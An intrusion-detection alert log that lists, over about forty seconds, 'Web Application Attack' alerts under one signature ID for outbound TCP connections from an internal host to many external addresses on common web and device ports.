2024-11-28T07:28:21.561666+0100	2029034	1	Web Application Attack	192.168.2.23	60262	79.141.55.107	80	TCP
2024-11-28T07:28:21.562376+0100	2029034	1	Web Application Attack	192.168.2.23	36202	151.33.64.10	7574	TCP
2024-11-28T07:28:21.563479+0100	2029034	1	Web Application Attack	192.168.2.23	53202	123.87.2.237	80	TCP
2024-11-28T07:28:21.564949+0100	2029034	1	Web Application Attack	192.168.2.23	50310	119.24.183.33	8080	TCP
2024-11-28T07:28:21.565680+0100	2029034	1	Web Application Attack	192.168.2.23	45748	75.221.225.250	49152	TCP
2024-11-28T07:28:21.566048+0100	2029034	1	Web Application Attack	192.168.2.23	58586	65.22.127.93	7574	TCP
2024-11-28T07:28:21.566775+0100	2029034	1	Web Application Attack	192.168.2.23	43462	142.149.121.92	5555	TCP
2024-11-28T07:28:21.568650+0100	2029034	1	Web Application Attack	192.168.2.23	50712	82.222.192.8	49152	TCP
2024-11-28T07:28:21.569014+0100	2029034	1	Web Application Attack	192.168.2.23	36988	68.81.189.11	5555	TCP
2024-11-28T07:28:21.569387+0100	2029034	1	Web Application Attack	192.168.2.23	54156	36.44.154.230	7574	TCP
2024-11-28T07:28:21.569832+0100	2029034	1	Web Application Attack	192.168.2.23	53132	175.176.33.31	49152	TCP
2024-11-28T07:28:21.570123+0100	2029034	1	Web Application Attack	192.168.2.23	59062	152.17.230.207	80	TCP
2024-11-28T07:28:21.570498+0100	2029034	1	Web Application Attack	192.168.2.23	49046	75.202.127.58	49152	TCP
2024-11-28T07:28:21.570869+0100	2029034	1	Web Application Attack	192.168.2.23	38508	58.88.196.167	7574	TCP
2024-11-28T07:28:21.571993+0100	2029034	1	Web Application Attack	192.168.2.23	50118	63.93.5.53	80	TCP
2024-11-28T07:28:21.572726+0100	2029034	1	Web Application Attack	192.168.2.23	48936	200.60.162.40	80	TCP
2024-11-28T07:28:21.573119+0100	2029034	1	Web Application Attack	192.168.2.23	45202	175.127.32.99	80	TCP
2024-11-28T07:28:21.574591+0100	2029034	1	Web Application Attack	192.168.2.23	47488	129.113.117.201	7574	TCP
2024-11-28T07:28:21.576071+0100	2029034	1	Web Application Attack	192.168.2.23	57684	82.116.130.80	5555	TCP
2024-11-28T07:28:21.576438+0100	2029034	1	Web Application Attack	192.168.2.23	47342	209.214.96.254	7574	TCP
2024-11-28T07:28:21.577174+0100	2029034	1	Web Application Attack	192.168.2.23	59396	148.252.76.108	7574	TCP
2024-11-28T07:28:21.578631+0100	2029034	1	Web Application Attack	192.168.2.23	60758	50.82.114.48	80	TCP
2024-11-28T07:28:21.579722+0100	2029034	1	Web Application Attack	192.168.2.23	49580	20.60.103.147	80	TCP
2024-11-28T07:28:21.580568+0100	2029034	1	Web Application Attack	192.168.2.23	39610	105.99.123.173	8080	TCP
2024-11-28T07:28:21.581286+0100	2029034	1	Web Application Attack	192.168.2.23	57344	188.62.117.113	80	TCP
2024-11-28T07:28:21.581664+0100	2029034	1	Web Application Attack	192.168.2.23	48266	125.76.215.12	8080	TCP
2024-11-28T07:28:21.582028+0100	2029034	1	Web Application Attack	192.168.2.23	46756	220.213.171.152	80	TCP
2024-11-28T07:28:21.582768+0100	2029034	1	Web Application Attack	192.168.2.23	55076	65.55.17.33	8080	TCP
2024-11-28T07:28:21.584606+0100	2029034	1	Web Application Attack	192.168.2.23	32834	76.152.169.208	80	TCP
2024-11-28T07:28:21.585005+0100	2029034	1	Web Application Attack	192.168.2.23	53220	191.108.27.83	80	TCP
2024-11-28T07:28:21.585752+0100	2029034	1	Web Application Attack	192.168.2.23	55176	78.194.76.189	80	TCP
2024-11-28T07:28:21.588352+0100	2029034	1	Web Application Attack	192.168.2.23	41004	145.189.228.46	80	TCP
2024-11-28T07:28:21.588720+0100	2029034	1	Web Application Attack	192.168.2.23	45058	222.71.55.197	80	TCP
2024-11-28T07:28:21.588733+0100	2029034	1	Web Application Attack	192.168.2.23	51846	166.252.165.142	8080	TCP
2024-11-28T07:28:21.589857+0100	2029034	1	Web Application Attack	192.168.2.23	59526	112.149.230.147	7574	TCP
2024-11-28T07:28:21.590578+0100	2029034	1	Web Application Attack	192.168.2.23	33998	118.181.71.158	49152	TCP
2024-11-28T07:28:21.591331+0100	2029034	1	Web Application Attack	192.168.2.23	37714	63.200.102.171	7574	TCP
2024-11-28T07:28:21.591693+0100	2029034	1	Web Application Attack	192.168.2.23	49396	103.249.111.10	7574	TCP
2024-11-28T07:28:21.592809+0100	2029034	1	Web Application Attack	192.168.2.23	38514	122.52.227.5	49152	TCP
2024-11-28T07:28:21.596898+0100	2029034	1	Web Application Attack	192.168.2.23	55994	44.79.80.80	7574	TCP
2024-11-28T07:28:21.597261+0100	2029034	1	Web Application Attack	192.168.2.23	44686	126.30.37.34	49152	TCP
2024-11-28T07:28:21.599855+0100	2029034	1	Web Application Attack	192.168.2.23	49792	36.30.167.44	8080	TCP
2024-11-28T07:28:21.600227+0100	2029034	1	Web Application Attack	192.168.2.23	48530	121.133.146.20	8080	TCP
2024-11-28T07:28:21.601333+0100	2029034	1	Web Application Attack	192.168.2.23	35292	216.225.199.77	7574	TCP
2024-11-28T07:28:21.601699+0100	2029034	1	Web Application Attack	192.168.2.23	58286	184.63.218.127	49152	TCP
2024-11-28T07:28:21.602442+0100	2029034	1	Web Application Attack	192.168.2.23	34854	176.190.233.75	8080	TCP
2024-11-28T07:28:21.603180+0100	2029034	1	Web Application Attack	192.168.2.23	52046	197.18.25.237	5555	TCP
2024-11-28T07:28:21.603538+0100	2029034	1	Web Application Attack	192.168.2.23	37048	58.181.145.4	49152	TCP
2024-11-28T07:28:21.604290+0100	2029034	1	Web Application Attack	192.168.2.23	33060	45.122.179.192	7574	TCP
2024-11-28T07:28:21.605409+0100	2029034	1	Web Application Attack	192.168.2.23	40128	102.244.106.84	8080	TCP
2024-11-28T07:28:21.607243+0100	2029034	1	Web Application Attack	192.168.2.23	46208	98.140.243.164	8080	TCP
2024-11-28T07:28:21.608663+0100	2029034	1	Web Application Attack	192.168.2.23	49900	158.11.245.225	5555	TCP
2024-11-28T07:28:21.609392+0100	2029034	1	Web Application Attack	192.168.2.23	52130	71.53.95.73	8080	TCP
2024-11-28T07:28:21.612726+0100	2029034	1	Web Application Attack	192.168.2.23	39452	28.46.37.247	5555	TCP
2024-11-28T07:28:21.613042+0100	2029034	1	Web Application Attack	192.168.2.23	46276	26.133.106.54	80	TCP
2024-11-28T07:28:21.614127+0100	2029034	1	Web Application Attack	192.168.2.23	51612	161.142.203.178	49152	TCP
2024-11-28T07:28:21.614495+0100	2029034	1	Web Application Attack	192.168.2.23	46222	122.119.110.139	80	TCP
2024-11-28T07:28:21.615215+0100	2029034	1	Web Application Attack	192.168.2.23	45496	209.173.57.59	7574	TCP
2024-11-28T07:28:24.310998+0100	2029034	1	Web Application Attack	192.168.2.23	48470	220.125.66.200	80	TCP
2024-11-28T07:28:32.523761+0100	2029034	1	Web Application Attack	192.168.2.23	38054	109.85.10.60	8080	TCP
2024-11-28T07:28:32.535333+0100	2029034	1	Web Application Attack	192.168.2.23	48668	51.143.223.68	7574	TCP
2024-11-28T07:28:32.540970+0100	2029034	1	Web Application Attack	192.168.2.23	49294	143.224.20.188	80	TCP
2024-11-28T07:28:32.546411+0100	2029034	1	Web Application Attack	192.168.2.23	58886	51.218.144.20	8080	TCP
2024-11-28T07:28:32.550174+0100	2029034	1	Web Application Attack	192.168.2.23	44182	142.207.82.41	80	TCP
2024-11-28T07:28:32.556586+0100	2029034	1	Web Application Attack	192.168.2.23	60678	40.136.214.250	49152	TCP
2024-11-28T07:28:32.580862+0100	2029034	1	Web Application Attack	192.168.2.23	54166	70.1.106.236	49152	TCP
2024-11-28T07:28:32.595080+0100	2029034	1	Web Application Attack	192.168.2.23	50920	160.236.191.233	8080	TCP
2024-11-28T07:28:32.613987+0100	2029034	1	Web Application Attack	192.168.2.23	35996	121.230.95.99	80	TCP
2024-11-28T07:28:33.528644+0100	2029034	1	Web Application Attack	192.168.2.23	55938	71.243.11.109	7574	TCP
2024-11-28T07:28:33.536324+0100	2029034	1	Web Application Attack	192.168.2.23	43492	62.8.207.250	7574	TCP
2024-11-28T07:28:33.537061+0100	2029034	1	Web Application Attack	192.168.2.23	43560	70.21.24.212	8080	TCP
2024-11-28T07:28:33.537804+0100	2029034	1	Web Application Attack	192.168.2.23	57110	204.181.118.146	80	TCP
2024-11-28T07:28:33.568298+0100	2029034	1	Web Application Attack	192.168.2.23	34690	82.44.161.231	80	TCP
2024-11-28T07:28:33.573810+0100	2029034	1	Web Application Attack	192.168.2.23	35288	211.126.112.179	8080	TCP
2024-11-28T07:28:33.597471+0100	2029034	1	Web Application Attack	192.168.2.23	32980	174.184.127.44	80	TCP
2024-11-28T07:28:35.505569+0100	2029034	1	Web Application Attack	192.168.2.23	60292	88.23.72.85	80	TCP
2024-11-28T07:28:35.509599+0100	2029034	1	Web Application Attack	192.168.2.23	43338	12.237.132.141	49152	TCP
2024-11-28T07:28:35.510000+0100	2029034	1	Web Application Attack	192.168.2.23	37540	33.213.94.85	8080	TCP
2024-11-28T07:28:35.510762+0100	2029034	1	Web Application Attack	192.168.2.23	51138	92.41.138.60	7574	TCP
2024-11-28T07:28:35.513504+0100	2029034	1	Web Application Attack	192.168.2.23	38642	161.129.248.205	80	TCP
2024-11-28T07:28:35.518631+0100	2029034	1	Web Application Attack	192.168.2.23	47054	213.133.80.58	7574	TCP
2024-11-28T07:28:35.532435+0100	2029034	1	Web Application Attack	192.168.2.23	59850	209.172.115.113	49152	TCP
2024-11-28T07:28:35.533526+0100	2029034	1	Web Application Attack	192.168.2.23	42036	64.169.75.53	49152	TCP
2024-11-28T07:28:35.547807+0100	2029034	1	Web Application Attack	192.168.2.23	41868	131.79.73.91	49152	TCP
2024-11-28T07:28:35.548960+0100	2029034	1	Web Application Attack	192.168.2.23	40954	190.8.212.205	8080	TCP
2024-11-28T07:28:35.563625+0100	2029034	1	Web Application Attack	192.168.2.23	45392	167.92.124.63	49152	TCP
2024-11-28T07:28:35.578360+0100	2029034	1	Web Application Attack	192.168.2.23	46750	167.112.47.39	49152	TCP
2024-11-28T07:28:35.592222+0100	2029034	1	Web Application Attack	192.168.2.23	38622	27.173.140.246	49152	TCP
2024-11-28T07:28:35.592592+0100	2029034	1	Web Application Attack	192.168.2.23	36586	32.73.167.208	8080	TCP
2024-11-28T07:28:35.605438+0100	2029034	1	Web Application Attack	192.168.2.23	53522	28.38.73.153	80	TCP
2024-11-28T07:28:39.503692+0100	2029034	1	Web Application Attack	192.168.2.23	44322	114.50.104.12	80	TCP
2024-11-28T07:28:39.509833+0100	2029034	1	Web Application Attack	192.168.2.23	37984	184.26.224.31	8080	TCP
2024-11-28T07:28:39.521470+0100	2029034	1	Web Application Attack	192.168.2.23	43248	151.108.41.77	7574	TCP
2024-11-28T07:28:39.541137+0100	2029034	1	Web Application Attack	192.168.2.23	42174	143.139.168.148	80	TCP
2024-11-28T07:28:39.546230+0100	2029034	1	Web Application Attack	192.168.2.23	43998	138.33.47.237	7574	TCP
2024-11-28T07:28:39.564765+0100	2029034	1	Web Application Attack	192.168.2.23	38334	183.240.144.8	8080	TCP
2024-11-28T07:28:39.595399+0100	2029034	1	Web Application Attack	192.168.2.23	57780	113.17.115.195	7574	TCP
2024-11-28T07:28:39.596667+0100	2029034	1	Web Application Attack	192.168.2.23	58306	33.57.34.254	7574	TCP
2024-11-28T07:28:39.597794+0100	2029034	1	Web Application Attack	192.168.2.23	45508	62.14.141.106	80	TCP
2024-11-28T07:28:39.598169+0100	2029034	1	Web Application Attack	192.168.2.23	48980	18.82.105.3	80	TCP
2024-11-28T07:28:39.598905+0100	2029034	1	Web Application Attack	192.168.2.23	39790	12.48.123.87	80	TCP
2024-11-28T07:28:39.607302+0100	2029034	1	Web Application Attack	192.168.2.23	58938	130.220.9.212	7574	TCP
2024-11-28T07:28:40.512520+0100	2029034	1	Web Application Attack	192.168.2.23	42138	125.6.120.150	8080	TCP
2024-11-28T07:28:40.525601+0100	2029034	1	Web Application Attack	192.168.2.23	58746	143.207.27.123	7574	TCP
2024-11-28T07:28:40.540101+0100	2029034	1	Web Application Attack	192.168.2.23	54810	135.245.8.129	8080	TCP
2024-11-28T07:28:40.541201+0100	2029034	1	Web Application Attack	192.168.2.23	42846	39.135.223.158	7574	TCP
2024-11-28T07:28:40.549595+0100	2029034	1	Web Application Attack	192.168.2.23	41354	50.4.239.166	80	TCP
2024-11-28T07:28:40.563951+0100	2029034	1	Web Application Attack	192.168.2.23	33470	159.88.243.196	80	TCP
2024-11-28T07:28:40.565419+0100	2029034	1	Web Application Attack	192.168.2.23	40164	95.37.33.94	5555	TCP
2024-11-28T07:28:40.577482+0100	2029034	1	Web Application Attack	192.168.2.23	33592	81.57.162.159	80	TCP
2024-11-28T07:28:40.598256+0100	2029034	1	Web Application Attack	192.168.2.23	56796	49.54.129.20	80	TCP
2024-11-28T07:28:40.599106+0100	2029034	1	Web Application Attack	192.168.2.23	52562	160.49.228.230	5555	TCP
2024-11-28T07:28:40.600107+0100	2029034	1	Web Application Attack	192.168.2.23	43992	80.42.12.79	80	TCP
2024-11-28T07:28:40.600483+0100	2029034	1	Web Application Attack	192.168.2.23	55988	99.101.189.71	7574	TCP
2024-11-28T07:28:40.607089+0100	2029034	1	Web Application Attack	192.168.2.23	43542	119.201.115.104	80	TCP
2024-11-28T07:28:40.607461+0100	2029034	1	Web Application Attack	192.168.2.23	49990	108.121.86.213	80	TCP
2024-11-28T07:28:40.607833+0100	2029034	1	Web Application Attack	192.168.2.23	49576	193.59.63.137	80	TCP
2024-11-28T07:28:42.524046+0100	2029034	1	Web Application Attack	192.168.2.23	48394	207.182.115.64	5555	TCP
2024-11-28T07:28:42.536624+0100	2029034	1	Web Application Attack	192.168.2.23	55648	209.157.77.209	49152	TCP
2024-11-28T07:28:42.564239+0100	2029034	1	Web Application Attack	192.168.2.23	36564	124.217.9.3	5555	TCP
2024-11-28T07:28:42.564985+0100	2029034	1	Web Application Attack	192.168.2.23	48106	51.212.199.239	7574	TCP
2024-11-28T07:28:42.565362+0100	2029034	1	Web Application Attack	192.168.2.23	58156	177.45.248.131	5555	TCP
2024-11-28T07:28:42.566867+0100	2029034	1	Web Application Attack	192.168.2.23	50214	135.175.75.166	80	TCP
2024-11-28T07:28:42.574247+0100	2029034	1	Web Application Attack	192.168.2.23	33030	185.111.88.127	80	TCP
2024-11-28T07:28:42.579065+0100	2029034	1	Web Application Attack	192.168.2.23	35576	185.54.32.124	7574	TCP
2024-11-28T07:28:42.580198+0100	2029034	1	Web Application Attack	192.168.2.23	54856	202.215.182.219	80	TCP
2024-11-28T07:28:42.580577+0100	2029034	1	Web Application Attack	192.168.2.23	60924	34.103.204.90	49152	TCP
2024-11-28T07:28:42.596309+0100	2029034	1	Web Application Attack	192.168.2.23	42938	191.222.250.184	80	TCP
2024-11-28T07:28:42.597078+0100	2029034	1	Web Application Attack	192.168.2.23	53568	102.14.30.69	80	TCP
2024-11-28T07:28:42.609650+0100	2029034	1	Web Application Attack	192.168.2.23	35458	125.168.142.96	80	TCP
2024-11-28T07:28:43.510411+0100	2029034	1	Web Application Attack	192.168.2.23	55954	194.195.128.159	49152	TCP
2024-11-28T07:28:43.514040+0100	2029034	1	Web Application Attack	192.168.2.23	40262	188.234.2.182	80	TCP
2024-11-28T07:28:43.519120+0100	2029034	1	Web Application Attack	192.168.2.23	43444	74.23.91.76	80	TCP
2024-11-28T07:28:43.537243+0100	2029034	1	Web Application Attack	192.168.2.23	55988	126.211.100.65	80	TCP
2024-11-28T07:28:43.548573+0100	2029034	1	Web Application Attack	192.168.2.23	34662	120.74.8.15	80	TCP
2024-11-28T07:28:43.551857+0100	2029034	1	Web Application Attack	192.168.2.23	55096	134.181.180.82	8080	TCP
2024-11-28T07:28:44.524321+0100	2029034	1	Web Application Attack	192.168.2.23	48330	68.204.22.76	49152	TCP
2024-11-28T07:28:44.527247+0100	2029034	1	Web Application Attack	192.168.2.23	49716	8.175.157.126	80	TCP
2024-11-28T07:28:44.607081+0100	2029034	1	Web Application Attack	192.168.2.23	50490	79.122.220.180	7574	TCP
2024-11-28T07:28:44.860500+0100	2029034	1	Web Application Attack	192.168.2.23	57784	54.193.111.157	8080	TCP
2024-11-28T07:28:45.613377+0100	2029034	1	Web Application Attack	192.168.2.23	59584	79.55.247.47	5555	TCP
2024-11-28T07:28:46.506471+0100	2029034	1	Web Application Attack	192.168.2.23	44310	7.197.38.114	80	TCP
2024-11-28T07:28:46.511180+0100	2029034	1	Web Application Attack	192.168.2.23	59058	214.55.27.251	8080	TCP
2024-11-28T07:28:46.511553+0100	2029034	1	Web Application Attack	192.168.2.23	50550	89.195.203.162	8080	TCP
2024-11-28T07:28:46.535899+0100	2029034	1	Web Application Attack	192.168.2.23	35474	181.211.240.72	5555	TCP
2024-11-28T07:28:46.573730+0100	2029034	1	Web Application Attack	192.168.2.23	58242	165.33.115.192	7574	TCP
2024-11-28T07:28:46.593344+0100	2029034	1	Web Application Attack	192.168.2.23	32836	132.49.66.157	8080	TCP
2024-11-28T07:28:46.606685+0100	2029034	1	Web Application Attack	192.168.2.23	40580	98.43.199.219	49152	TCP
2024-11-28T07:28:47.516810+0100	2029034	1	Web Application Attack	192.168.2.23	38530	115.160.25.132	49152	TCP
2024-11-28T07:28:47.529126+0100	2029034	1	Web Application Attack	192.168.2.23	43916	222.208.184.50	80	TCP
2024-11-28T07:28:47.552075+0100	2029034	1	Web Application Attack	192.168.2.23	42528	84.204.137.1	7574	TCP
2024-11-28T07:28:47.573135+0100	2029034	1	Web Application Attack	192.168.2.23	41040	156.26.16.136	80	TCP
2024-11-28T07:28:47.576042+0100	2029034	1	Web Application Attack	192.168.2.23	42086	85.251.156.135	8080	TCP
2024-11-28T07:28:47.576780+0100	2029034	1	Web Application Attack	192.168.2.23	46286	186.90.183.139	7574	TCP
2024-11-28T07:28:47.592450+0100	2029034	1	Web Application Attack	192.168.2.23	33724	198.217.213.38	80	TCP
2024-11-28T07:28:47.593913+0100	2029034	1	Web Application Attack	192.168.2.23	51016	22.97.50.105	80	TCP
2024-11-28T07:28:47.599540+0100	2029034	1	Web Application Attack	192.168.2.23	34238	59.132.118.216	49152	TCP
2024-11-28T07:28:47.964100+0100	2029034	1	Web Application Attack	192.168.2.23	48332	172.247.225.129	49152	TCP
2024-11-28T07:28:48.608088+0100	2029034	1	Web Application Attack	192.168.2.23	55840	15.190.124.56	80	TCP
2024-11-28T07:28:49.555902+0100	2029034	1	Web Application Attack	192.168.2.23	50966	23.180.101.127	5555	TCP
2024-11-28T07:28:49.556649+0100	2029034	1	Web Application Attack	192.168.2.23	33992	51.162.240.71	5555	TCP
2024-11-28T07:28:49.558136+0100	2029034	1	Web Application Attack	192.168.2.23	43088	101.21.160.39	5555	TCP
2024-11-28T07:28:49.564014+0100	2029034	1	Web Application Attack	192.168.2.23	46224	135.53.13.211	8080	TCP
2024-11-28T07:28:49.579307+0100	2029034	1	Web Application Attack	192.168.2.23	42632	209.204.25.76	49152	TCP
2024-11-28T07:28:49.583321+0100	2029034	1	Web Application Attack	192.168.2.23	47476	92.139.107.125	80	TCP
2024-11-28T07:28:49.587290+0100	2029034	1	Web Application Attack	192.168.2.23	35836	220.208.144.34	80	TCP
2024-11-28T07:28:49.592051+0100	2029034	1	Web Application Attack	192.168.2.23	49500	85.4.54.19	5555	TCP
2024-11-28T07:28:49.594617+0100	2029034	1	Web Application Attack	192.168.2.23	40682	163.157.242.224	7574	TCP
2024-11-28T07:28:50.592619+0100	2029034	1	Web Application Attack	192.168.2.23	45440	121.99.176.231	5555	TCP
2024-11-28T07:28:50.593006+0100	2029034	1	Web Application Attack	192.168.2.23	43188	140.43.141.189	80	TCP
2024-11-28T07:28:50.597548+0100	2029034	1	Web Application Attack	192.168.2.23	43928	146.249.197.42	49152	TCP
2024-11-28T07:28:50.598655+0100	2029034	1	Web Application Attack	192.168.2.23	49872	91.224.230.66	80	TCP
2024-11-28T07:28:50.600502+0100	2029034	1	Web Application Attack	192.168.2.23	51470	9.158.147.239	8080	TCP
2024-11-28T07:28:50.608145+0100	2029034	1	Web Application Attack	192.168.2.23	35368	21.137.144.212	5555	TCP
2024-11-28T07:28:51.520128+0100	2029034	1	Web Application Attack	192.168.2.23	33090	162.29.10.11	8080	TCP
2024-11-28T07:28:51.529237+0100	2029034	1	Web Application Attack	192.168.2.23	60458	82.143.199.143	7574	TCP
2024-11-28T07:28:51.542004+0100	2029034	1	Web Application Attack	192.168.2.23	48922	107.51.18.168	8080	TCP
2024-11-28T07:28:51.548632+0100	2029034	1	Web Application Attack	192.168.2.23	48890	157.184.78.73	80	TCP
2024-11-28T07:28:51.561027+0100	2029034	1	Web Application Attack	192.168.2.23	34172	157.246.210.71	80	TCP
2024-11-28T07:28:51.566486+0100	2029034	1	Web Application Attack	192.168.2.23	57012	78.96.38.197	49152	TCP
2024-11-28T07:28:51.568684+0100	2029034	1	Web Application Attack	192.168.2.23	52068	201.26.129.210	5555	TCP
2024-11-28T07:28:51.579604+0100	2029034	1	Web Application Attack	192.168.2.23	42904	62.65.0.86	49152	TCP
2024-11-28T07:28:51.590525+0100	2029034	1	Web Application Attack	192.168.2.23	42350	106.105.215.91	7574	TCP
2024-11-28T07:28:51.601624+0100	2029034	1	Web Application Attack	192.168.2.23	37260	39.5.42.35	80	TCP
2024-11-28T07:28:52.511023+0100	2029034	1	Web Application Attack	192.168.2.23	48362	123.118.217.200	49152	TCP
2024-11-28T07:28:52.513208+0100	2029034	1	Web Application Attack	192.168.2.23	51630	56.179.245.184	5555	TCP
2024-11-28T07:28:52.513587+0100	2029034	1	Web Application Attack	192.168.2.23	34620	191.143.159.171	8080	TCP
2024-11-28T07:28:52.518329+0100	2029034	1	Web Application Attack	192.168.2.23	44932	170.86.222.194	80	TCP
2024-11-28T07:28:52.518694+0100	2029034	1	Web Application Attack	192.168.2.23	35872	179.139.60.246	49152	TCP
2024-11-28T07:28:52.549855+0100	2029034	1	Web Application Attack	192.168.2.23	52488	45.201.111.138	7574	TCP
2024-11-28T07:28:52.550230+0100	2029034	1	Web Application Attack	192.168.2.23	53836	165.78.188.57	7574	TCP
2024-11-28T07:28:52.586761+0100	2029034	1	Web Application Attack	192.168.2.23	58350	159.209.117.216	80	TCP
2024-11-28T07:28:52.596372+0100	2029034	1	Web Application Attack	192.168.2.23	52776	199.231.185.52	49152	TCP
2024-11-28T07:28:53.527429+0100	2029034	1	Web Application Attack	192.168.2.23	42862	193.56.195.3	5555	TCP
2024-11-28T07:28:53.532605+0100	2029034	1	Web Application Attack	192.168.2.23	49172	61.157.149.118	8080	TCP
2024-11-28T07:28:53.535181+0100	2029034	1	Web Application Attack	192.168.2.23	55176	173.109.36.223	5555	TCP
2024-11-28T07:28:53.562267+0100	2029034	1	Web Application Attack	192.168.2.23	50080	61.52.194.233	8080	TCP
2024-11-28T07:28:53.581226+0100	2029034	1	Web Application Attack	192.168.2.23	36844	196.241.64.223	5555	TCP
2024-11-28T07:28:53.588134+0100	2029034	1	Web Application Attack	192.168.2.23	59186	203.55.84.100	8080	TCP
2024-11-28T07:28:53.606799+0100	2029034	1	Web Application Attack	192.168.2.23	48580	43.138.13.59	5555	TCP
2024-11-28T07:28:54.520005+0100	2029034	1	Web Application Attack	192.168.2.23	56568	8.169.9.136	7574	TCP
2024-11-28T07:28:54.539355+0100	2029034	1	Web Application Attack	192.168.2.23	59082	189.96.186.101	8080	TCP
2024-11-28T07:28:54.557927+0100	2029034	1	Web Application Attack	192.168.2.23	60970	132.235.32.53	5555	TCP
2024-11-28T07:28:54.559757+0100	2029034	1	Web Application Attack	192.168.2.23	58140	143.80.92.37	80	TCP
2024-11-28T07:28:54.560133+0100	2029034	1	Web Application Attack	192.168.2.23	56124	125.3.202.54	5555	TCP
2024-11-28T07:28:54.569430+0100	2029034	1	Web Application Attack	192.168.2.23	54118	22.231.22.122	7574	TCP
2024-11-28T07:28:54.591281+0100	2029034	1	Web Application Attack	192.168.2.23	48022	145.44.151.243	7574	TCP
2024-11-28T07:28:54.600602+0100	2029034	1	Web Application Attack	192.168.2.23	49512	40.167.252.186	5555	TCP
2024-11-28T07:28:54.612641+0100	2029034	1	Web Application Attack	192.168.2.23	41590	124.211.152.15	49152	TCP
2024-11-28T07:28:55.243263+0100	2029034	1	Web Application Attack	192.168.2.23	42992	218.237.39.87	7574	TCP
2024-11-28T07:28:55.505373+0100	2029034	1	Web Application Attack	192.168.2.23	47254	170.189.236.39	80	TCP
2024-11-28T07:28:55.512991+0100	2029034	1	Web Application Attack	192.168.2.23	44240	51.93.70.197	80	TCP
2024-11-28T07:28:55.513360+0100	2029034	1	Web Application Attack	192.168.2.23	36786	168.241.230.8	8080	TCP
2024-11-28T07:28:55.514464+0100	2029034	1	Web Application Attack	192.168.2.23	59722	172.158.193.226	8080	TCP
2024-11-28T07:28:55.524626+0100	2029034	1	Web Application Attack	192.168.2.23	59732	147.111.155.6	49152	TCP
2024-11-28T07:28:55.526093+0100	2029034	1	Web Application Attack	192.168.2.23	33198	115.246.201.155	49152	TCP
2024-11-28T07:28:55.562930+0100	2029034	1	Web Application Attack	192.168.2.23	55080	180.113.118.213	7574	TCP
2024-11-28T07:28:55.566548+0100	2029034	1	Web Application Attack	192.168.2.23	41778	40.164.246.161	7574	TCP
2024-11-28T07:28:55.577093+0100	2029034	1	Web Application Attack	192.168.2.23	59866	211.138.21.19	80	TCP
2024-11-28T07:28:55.584752+0100	2029034	1	Web Application Attack	192.168.2.23	41926	171.169.146.157	8080	TCP
2024-11-28T07:28:55.588397+0100	2029034	1	Web Application Attack	192.168.2.23	49574	140.158.65.199	8080	TCP
2024-11-28T07:28:55.598049+0100	2029034	1	Web Application Attack	192.168.2.23	54764	29.239.31.161	80	TCP
2024-11-28T07:28:55.606082+0100	2029034	1	Web Application Attack	192.168.2.23	45630	183.52.110.34	49152	TCP
2024-11-28T07:28:56.513090+0100	2029034	1	Web Application Attack	192.168.2.23	49176	125.200.222.101	49152	TCP
2024-11-28T07:28:56.523677+0100	2029034	1	Web Application Attack	192.168.2.23	44954	31.231.192.61	80	TCP
2024-11-28T07:28:56.539375+0100	2029034	1	Web Application Attack	192.168.2.23	41852	86.150.230.141	80	TCP
2024-11-28T07:28:56.572793+0100	2029034	1	Web Application Attack	192.168.2.23	53976	14.51.67.165	7574	TCP
2024-11-28T07:28:56.577246+0100	2029034	1	Web Application Attack	192.168.2.23	42638	135.158.93.91	49152	TCP
2024-11-28T07:28:56.579514+0100	2029034	1	Web Application Attack	192.168.2.23	41808	175.147.95.27	80	TCP
2024-11-28T07:28:56.585101+0100	2029034	1	Web Application Attack	192.168.2.23	38508	115.145.51.196	7574	TCP
2024-11-28T07:28:56.597338+0100	2029034	1	Web Application Attack	192.168.2.23	43196	20.189.75.252	49152	TCP
2024-11-28T07:28:56.598148+0100	2029034	1	Web Application Attack	192.168.2.23	41222	176.37.130.5	80	TCP
2024-11-28T07:28:56.598553+0100	2029034	1	Web Application Attack	192.168.2.23	32792	135.114.48.83	8080	TCP
2024-11-28T07:28:56.599310+0100	2029034	1	Web Application Attack	192.168.2.23	55390	83.115.151.78	7574	TCP
2024-11-28T07:28:56.791046+0100	2029034	1	Web Application Attack	192.168.2.23	39386	72.224.33.251	80	TCP
2024-11-28T07:28:57.501565+0100	2029034	1	Web Application Attack	192.168.2.23	35774	68.59.165.16	7574	TCP
2024-11-28T07:28:57.504106+0100	2029034	1	Web Application Attack	192.168.2.23	45348	58.171.37.18	7574	TCP
2024-11-28T07:28:58.338974+0100	2029034	1	Web Application Attack	192.168.2.23	45816	175.214.251.146	5555	TCP
2024-11-28T07:28:58.521479+0100	2029034	1	Web Application Attack	192.168.2.23	35912	17.27.221.1	7574	TCP
2024-11-28T07:28:58.543907+0100	2029034	1	Web Application Attack	192.168.2.23	38690	80.152.5.18	80	TCP
2024-11-28T07:28:58.590168+0100	2029034	1	Web Application Attack	192.168.2.23	49244	102.225.249.90	49152	TCP
2024-11-28T07:28:58.604363+0100	2029034	1	Web Application Attack	192.168.2.23	53030	178.30.221.80	49152	TCP
2024-11-28T07:28:59.512085+0100	2029034	1	Web Application Attack	192.168.2.23	52794	16.185.70.74	8080	TCP
2024-11-28T07:28:59.514817+0100	2029034	1	Web Application Attack	192.168.2.23	53128	113.238.60.121	5555	TCP
2024-11-28T07:28:59.515217+0100	2029034	1	Web Application Attack	192.168.2.23	40770	187.128.167.185	7574	TCP
2024-11-28T07:28:59.517566+0100	2029034	1	Web Application Attack	192.168.2.23	38230	118.209.168.11	8080	TCP
2024-11-28T07:28:59.523396+0100	2029034	1	Web Application Attack	192.168.2.23	38976	196.163.226.86	49152	TCP
2024-11-28T07:28:59.570627+0100	2029034	1	Web Application Attack	192.168.2.23	53250	72.23.44.134	5555	TCP
2024-11-28T07:28:59.604975+0100	2029034	1	Web Application Attack	192.168.2.23	49478	163.150.75.77	8080	TCP
2024-11-28T07:28:59.607011+0100	2029034	1	Web Application Attack	192.168.2.23	40010	73.187.21.113	80	TCP
2024-11-28T07:28:59.992394+0100	2029034	1	Web Application Attack	192.168.2.23	55442	73.29.227.17	80	TCP
2024-11-28T07:29:00.508147+0100	2029034	1	Web Application Attack	192.168.2.23	59788	8.66.52.210	8080	TCP
2024-11-28T07:29:00.514391+0100	2029034	1	Web Application Attack	192.168.2.23	60152	74.19.91.85	5555	TCP
2024-11-28T07:29:00.555685+0100	2029034	1	Web Application Attack	192.168.2.23	37988	120.175.236.38	80	TCP
2024-11-28T07:29:00.566660+0100	2029034	1	Web Application Attack	192.168.2.23	32942	118.193.197.235	49152	TCP
